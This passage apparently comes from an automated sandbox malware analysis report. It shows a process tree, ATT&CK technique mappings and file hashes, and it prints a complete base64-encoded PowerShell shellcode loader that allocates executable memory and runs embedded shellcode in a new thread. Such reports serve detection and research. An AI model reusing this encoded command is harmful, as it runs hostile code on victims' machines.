HMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAQQBGADAAIAAkAEUAdgAzAHYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQARQB2ADMAdgAgACQAZQAiADsAfQA=
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JAAwAFIAQwAyACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAMABSAEMAMgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkADkALAAwAHgAYwA5ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeABiADgALAAwAHgAOAA4ACwAMAB4ADkAZAAsADAAeAAwAGIALAAwAHgAYwA3ACwAMAB4ADUAZQAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADQANgAsADAAeAAxADcALAAwAHgAMAAzACwAMAB4ADQANgAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4ADQAZQAsADAAeAA5ADkALAAwAHgAZQA5ACwAMAB4ADMAMgAsADAAeABiADIALAAwAHgANABhACwAMAB4ADYAMgAsADAAeABiAGMALAAwAHgANABhACwAMAB4ADgAYgAsADAAeAAxAGQALAAwAHgAMwA0ACwAMAB4AGEAZgAsADAAeABiAGEALAAwAHgAMABmACwAMAB4ADIAMgAsADAAeABhADQALAAwAHgAZQBmACwAMAB4ADkAZgAsADAAeAAyADAALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeAA2AGIALAAwAHgANgA0ACwAMAB4ADEAOAAsADAAeAA5ADcALAAwAHgAMQA5ACwAMAB4AGEAMQAsADAAeAAyAGYALAAwAHgAMQAwACwAMAB4ADkANwAsADAAeAA5ADcALAAwAHgAMQBlACwAMAB4AGEAMQAsADAAeAAxADkALAAwAHgAMQA4ACwAMAB4AGMAYwAsADAAeAA2ADEALAAwAHgAMwBiACwAMAB4AGUANAAsADAAeAAwAGUALAAwAHgAYgA2ACwAMAB4ADkAYgAsADAAeABkADUALAAwAHgAYwAxACwAMAB4AGMAYgAsADAAeABkAGEALAAwAHgAMQAyACwAMAB4ADkANAAsADAAeABhADYALAAwAHgAMwAzACwAMAB4AGMAZQAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4AGQAYwAsADAAeABiADgALAAwAHgAMwBhACwAMAB4AGQAOQAsADAAeABlADAALAAwAHgANAA3ACwAMAB4AGUAYwAsADAAeAA1ADUALAAwAHgANQA4ACwAMAB4ADMAMAAsADAAeAA4ADkALAAwAHgAYQBhACwAMAB4ADIAZAAsADAAeAA4AGMALAAwAHgAOQAwACwAMAB4AGYAYQAsADAAeAA0ADUALAAwAHgANAA0ACwAMAB4ADgAYQAsADAAeAA3ADEALAAwAHgAMAAxACwAMAB4ADcANQAsADAAeABhAGIALAAwAHgANQA2ACwAMAB4AGUAMgAsADAAeABmADAALAAwAHgANgAyACwAMAB4ADIAYwAsADAAeAAzAGYALAAwAHgAYwBhACwAMAB4ADgAYgAsADAAeAA4ADQALAAwAHgAYgA0ACwAMAB4ADEAOAAsADAAeABmADgALAAwAHgAMQA2ACwAMAB4ADEAZAAsADAAeAA1ADEALAAwAHgAMwBlACwAMAB4AGIANAAsADAAeAA2ADAALAAwAHgANQBkACwAMAB4AGIAMwAsADAAeABjADQALAAwAHgAYQA1ACwAMAB4ADUAYQAsADAAeAAyAGIALAAwAHgAYgAzACwAMAB4AGQAZAAsADAAeAA5ADgALAAwAHgAZAA2ACwAMAB4AGMANAAsADAAeAAyADUALAAwAHgAZQAyACwAMAB4ADAAYwAsADAAeAA0ADAALAAwAHgAYgBhACwAMAB4ADQANAAsADAAeABjADcALAAwAHgAZgAyACwAMAB4ADEAZQAsADAAeAA3ADQALAAwAHgAMAA0ACwAMAB4ADYANAAsADAAeABkADQALAAwAHgANwBhACwAMAB4AGUAMQAsADAAeABlADIALAAwAHgAYgAyACwAMAB4ADkAZQAsADAAeABmADQALAAwAHgAMgA3ACwAMAB4AGMAOQAsADAAeAA5AGIALAAwAHgANwBkACwAMAB4AGMANgAsADAAeAAxAGUALAAwAHgAMgBhACwAMAB4AGMANQAsADAAeABlAGQALAAwAHgAYgBhACwAMAB4ADcANgAsADAAeAA5AGUALAAwAHgAOABjACwAMAB4ADkAYgAsADAAeABkADIALAAwAHgANwAxACwAMAB4AGIAMAAsADAAeABmAGMALAAwAHgAYgBiACwAMAB4ADIAZQAsADAAeAAxADQALAAwAHgANwA2ACwAMAB4ADIAOQAsADAAeAAzADkALAAwAHgAMgA4ACwAMAB4ADcANwAsADAAeABiADEALAAwAHgANAA2ACwAMAB4ADcANAAsADAAeABlADAALAAwAHgANwBkACwAMAB4ADgAYQAsADAAeAA4ADcALAAwAHgAZgAwACwAMAB4AGUAOQAsADAAeAA5AGQALAAwAHgAZgA0ACwAMAB4AGMAMgAsADAAeABiADYALAAwAHgAMwA1ACwAMAB4ADkAMwAsADAAeAA2AGUALAAwAHgAMwBlACwAMAB4ADkAMwAsADAAeAA2ADQALAAwAHgAZQA2ACwAMAB4ADIAOAAsADAAeAAyADQALAAwAHgAYgBhACwAMAB4ADQAMAAsADAAeAAzADgALAAwAHgAZABiACwAMAB4ADMAYgAsADAAeABiADEALAAwAHgAMQAwACwAMAB4ADEAZgAsADAAeAA2AGYALAAwAHgAZQAxACwAMAB4ADAAYQAsADAAeABiADYALAAwAHgAMQAwACwAMAB4ADYAYQAsADAAeABjAGIALAAwAHgAMwA3ACwAMAB4AGMANQAsADAAeAAwADcALAAwAHgAYwAxACwAMAB4AGEAZgAsADAAeAAyADYALAAwAHgANwBmACwAMAB4AGMANwAsADAAeAA0ADUALAAwAHgAYwBmACwAMAB4ADgAMgAsADAAeABlADgALAAwAHgAOAA4ACwAMAB4AGIAOAAsADAAeAAwAGEALAAwAHgAMABlACwAMAB4AGYAYQAsADAAeAA5ADYALAAwAHgANQBjACwAMAB4ADkAZgAsADAAeABiAGEALAAwAHgANAA2ACwAMAB4ADEAZAAsADAAeAA0AGYALAAwAHgANQAyACwAMAB4ADgAZAAsADAAeAA5ADIALAAwAHgAYgAwACwAMAB4ADQAMgAsADAAeABhAGUALAAwAHgANwA4ACwAMAB4AGQAOQAsADAAeABlADgALAAwAHgANAAxACwAMAB4AGQANQAsADAAeABiADEALAAwAHgAOAA0ACwAMAB4AGYAOAAsADAAeAA3AGMALAAwAHgANAA5ACwAMAB4ADMANQAsADAAeAAwADQALAAwAHgAYQBiACwAMAB4ADMANwAsADAAeAA3ADUALAAwAHgAOABlACwAMAB4ADUAOAAsADAAeABjADcALAAwAHgAMwBiACwAMAB4ADYANwAsADAAeAAxADQALAAwAHgAZABiACwAMAB4AGEAYgAsADAAeAA4ADcALAAwAHgANgAzACwAMAB4ADgAMQAsADAAeAA3AGQALAAwAHgAOQA3ACwAMAB4ADUAOQAsADAAeABhAGMALAAwAHgAOAAxACwAMAB4ADAAZAAsADAAeAA2ADYALAAwAHgANgA3ACwAMAB4AGQANgAsADAAeABiADkALAAwAHgANgA0ACwAMAB4ADUAZQAsADAAeAAxADAALAAwAHgANgA2ACwAMAB4ADkANgAsADAAeABiADUALAAwAHgAMgBiACwAMAB4AGEAZgAsADAAeAAwADIALAAwAHgANwA2ACwAMAB4ADQAMwAsADAAeABkADAALAAwAHgAYwAyACwAMAB4ADcANgAsADAAeAA5ADMALAAwAHgAOAA2ACwAMAB4ADgAOAAsADAAeAA3ADYALAAwAHgAZgBiACwAMAB4ADcAZQAsADAAeABlADkALAAwAHgAMgA0ACwAMAB4ADEAZQAsADAAeAA4ADEALAAwAHgAMgA0ACwAMAB4ADUAOQAsADAAeABiADMALAAwAHgAMQA0ACwAMAB4AGMANwAsADAAeAAwADgALAAwAHgANgAwACwAMAB4AGIAZQAsADAAeABhAGYALAAwAHgAYgA2ACwAMAB4ADUAZgAsADAAeAA4ADgALAAwAHgANgBmACwAMAB4ADQAOAAsADAAeAA4AGEALAAwAHgAMAA4ACwAMAB4ADUAMwAsADAAeAA5AGYALAAwAHgAZgAyACwAMAB4ADcAZQAsADAAeABiAGQALAAwAHgAMgAzADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABPAFYAUQBKAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABPAFYAUQBKAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABPAFYAUQBKACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2188
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z1m2qa51\z1m2qa51.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2720
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBECC.tmp" "c:\Users\Admin\AppData\Local\Temp\z1m2qa51\CSC4388E5A9E65149AF8786B95C11BBEE70.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESBECC.tmp

Filesize
1KB

MD5
a2163a596ac83d133572d977ee555449

SHA1
96cd1bf38be10b03ca1d1bc114f5926b17c71ad8

SHA256
9217f724498d508b68a21ed4fcfc7614f514e14fa387de7f143259d273a979ec

SHA512
e8c84dc25cdc4cca70f0767c84e441318f8f621c7e76fc289cab3c3186556c86fc49c56ed3a6d05ee09f7c9b6a5cdd497545fb7fda112b401c4e5cfaac821f05

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0p3cjewp.5oh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\z1m2qa51\z1m2qa51.dll

Filesize
3KB

MD5
269da34ae0810e4ee4dfa7278c357ba2

SHA1
19c31a369c3072b8d58d58f86eb407bedc11d0c7

SHA256
98e002d827bafc12ae9b31eef27781938dca87d8c6eac180cfcec049915cfeda

SHA512
edac3ec085bf59a3e7f827feef45e049bcba382402409f9958056e60ea4daee4daf289bacc7ea38e4df4703b466cdd87a237619fe7e9c7dbf18148614f5b064f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z1m2qa51\CSC4388E5A9E65149AF8786B95C11BBEE70.TMP

Filesize
652B

MD5
4413622e9d3cd1eeb21e95086ad22167

SHA1
f443ed8bb6d68da09df08aec27417ea3945142cb

SHA256
b790e66a84aeb1ae6f5164fe5392d28fe483e7e41e8b05f75fed57fe3613e9b1

SHA512
88bfe0088b5c16543e21199a349381891367f79c2d5d1b2893d8daf046f817807ae0407801673718026f3a51d33c9afdf727d374f42b003a0fbc108ac8779d92

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z1m2qa51\z1m2qa51.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z1m2qa51\z1m2qa51.cmdline

Filesize
369B

MD5
84ddc0074d1717b4c23c622d33fefcff

SHA1
58a94c6d4ef88f00e45bbca0e2099ab48023131e

SHA256
39252ebb2ac3e6954f3e7f88fee3e74e5f5a01cd9441bd28f33dfe0bdced1b32

SHA512
66b75cd14792d6ef0dad858c3e80b3c48c50383455dc27d18c4f6d16fb1c1fc7bf1f25a0e85b0721a77c75e3a57c51f3e701710d5df2d0261d97c1c82db278d5

Download Submit
memory/2188-15-0x0000000074F9E000-0x0000000074F9F000-memory.dmp

Filesize
4KB

Download
memory/2188-36-0x0000000006AA0000-0x0000000006ABA000-memory.dmp

Filesize
104KB

Download
memory/2188-16-0x0000000002FE0000-0x0000000003016000-memory.dmp

Filesize
216KB

Download
memory/2188-17-0x00000000057F0000-0x0000000005E18000-memory.dmp

Filesize
6.2MB

Download
memory/2188-18-0x0000000005700000-0x0000000005722000-memory.dmp

Filesize
136KB

Download
memory/2188-20-0x0000000005E90000-0x0000000005EF6000-memory.dmp

Filesize
408KB

Download
memory/2188-19-0x0000000005E20000-0x0000000005E86000-memory.dmp

Filesize
408KB

Download
memory/2188-21-0x0000000074F90000-0x0000000075740000-memory.dmp

Filesize
7.7MB

Download
memory/2188-31-0x0000000005F90000-0x00000000062E4000-memory.dmp

Filesize
3.3MB

Download
memory/2188-32-0x0000000074F90000-0x0000000075740000-memory.dmp

Filesize
7.7MB

Download
memory/2188-33-0x00000000065D0000-0x00000000065EE000-memory.dmp

Filesize
120KB

Download
memory/2188-34-0x0000000006BE0000-0x0000000006C2C000-memory.dmp

Filesize
304KB

Download
memory/2188-35-0x0000000007E40000-0x00000000084BA000-memory.dmp

Filesize
6.5MB

Download
memory/2188-55-0x0000000074F90000-0x0000000075740000-memory.dmp

Filesize
7.7MB

Download
memory/2188-54-0x0000000074F9E000-0x0000000074F9F000-memory.dmp

Filesize
4KB

Download
memory/2188-51-0x0000000006BC0000-0x0000000006BC1000-memory.dmp

Filesize
4KB

Download
memory/2188-49-0x0000000006B10000-0x0000000006B18000-memory.dmp

Filesize
32KB

Download
memory/3492-1-0x0000000000930000-0x000000000093A000-memory.dmp

Filesize
40KB

Download
memory/3492-52-0x00007FFB476E3000-0x00007FFB476E5000-memory.dmp

Filesize
8KB

Download
memory/3492-0-0x00007FFB476E3000-0x00007FFB476E5000-memory.dmp

Filesize
8KB

Download
memory/3592-7-0x0000023A78E20000-0x0000023A78E42000-memory.dmp

Filesize
136KB

Download
memory/3592-12-0x00007FFB476E0000-0x00007FFB481A1000-memory.dmp

Filesize
10.8MB

Download
memory/3592-13-0x00007FFB476E0000-0x00007FFB481A1000-memory.dmp

Filesize
10.8MB

Download
memory/3592-53-0x00007FFB476E0000-0x00007FFB481A1000-memory.dmp

Filesize
10.8MB

Download
memory/3592-14-0x00007FFB476E0000-0x00007FFB481A1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads